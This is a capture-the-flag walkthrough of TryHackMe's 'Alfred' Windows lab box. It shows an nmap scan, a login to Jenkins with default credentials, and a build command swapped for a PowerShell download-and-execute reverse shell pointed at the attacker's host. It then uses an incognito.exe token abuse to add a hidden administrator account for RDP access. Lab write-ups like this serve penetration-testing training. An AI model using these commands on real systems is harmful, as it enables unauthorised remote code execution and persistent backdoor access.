My Computer

17 object(s)
 

Alfred

Alfred is the second machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.


Enumeration

The output of the nmap scan:

nmap -sC -sV 10.10.0.34
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 05:25 EDT
Nmap scan report for 10.10.0.34
Host is up (0.053s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  ssl/ms-wbt-server?
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.30 seconds

Port 8080 contains Jenkins login page. According to Jenkins documentation, default credentials should be the admin:password pair, but this is not the case. The first option to check is other “default” password pairs. admin:admin will do the trick this time.


Exploitation

A few words about Jenkins before we move on:

Jenkins – an open source automation server which enables developers around the world to reliably build, test, and deploy their software.

From the attacker’s perspective, this is a goldmine. First, you can execute system command with it. Second, already created projects and builds might contain a ton of priceless data.

We can see that Jenkins is already has a build for the project named, well, project.

Navigate to the configurations of the project:

http://10.10.0.34:8080/job/project/configure

We are looking for the Build section of it. You can see that to make a new build, Jenkins execute a Windows bash command and running whoami command. Let’s replace the whoami command and download a reverse shell to our Kali Linux machine.

A common way to do that with the Windows box is to use something like nishang PowerShell reverse shell.

Simply add the line to the end of the file:

Invoke-PowerShellTcp -Reverse -IPAddress 10.11.19.53 -Port 1337

Serve the HTTP server to host that file by executing the following command:

sudo python -m SimpleHTTPServer 80

Prepare a listener on the port 1337 with nc:

sudo nc -nlvp 1337

We are done with preparations on the Kali Linux side, let’s modify the Build command in Jenkins now. Replace the whoami with the following:

powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.19.53/Invoke-PowerShellTcp.ps1')

Hit the Build Now and take a break for a second. Jenkins will make a new build and by doing that, it will also download and execute your reverse shell as a user bruce.


PrivEsc

Let’s check what privileges the user bruce has:

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeDebugPrivilege                Debug programs                            Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled

The official guide is covering only the way how to do it with Metasploit, but of course, you can do the same without it.

The role SeImpersonatePrivilege allows you to impersonate a client. We can exploit that to gain privileged access to the local system. The official guide is also offering you to use the incognito module for Metasploit, but you can download it as a stand-alone binary. Transfer incognito.exe to the machine in any preferred way. If you don’t have one, you can use this PowerShell one-liner:

(New-Object System.Net.WebClient).DownloadFile("https://<YOUR_IP>/<FILE_NAME>", "C:\<PATH_TO_THE_FILE><FILE_NAME>")  

When you will have your file on the box, you can impersonate NT AUTHORITY\SYSTEM token as the official guide recommend you, but you could also create a new user with admin rights:

PS C:\users\public\Documents> ./incognito.exe add_user carrotcake SuperSecretPassw0rd123                             
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.                                                
[*] Enumerating tokens                                                                                               
[*] Attempting to add user carrotcake to host 127.0.0.1                                                              
[+] Successfully added user                 


PS C:\users\public\Documents> ./incognito.exe add_localgroup_user Administrators carrotcake                          
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.                                                
[*] Enumerating tokens                                                                                               
[*] Attempting to add user carrotcake to local group Administrators on host 127.0.0.1                                
[+] Successfully added user to local group  

Here we are creating a new user carrotcake with the password SuperSecretPassw0rd123 via incognito.exe, and then adding this account to the local group Administrators.

You can now try to login to the box with a new account. We can use RDP protocol as the port 3389 is open:

rdesktop -u carrotcake -p SuperSecretPassw0rd123 10.10.0.34

OR you can use the tool Remmina instead of rdesktop. It has a built-in screenshot taker and works way more stable in my taste. How to install Remmina


Takeaway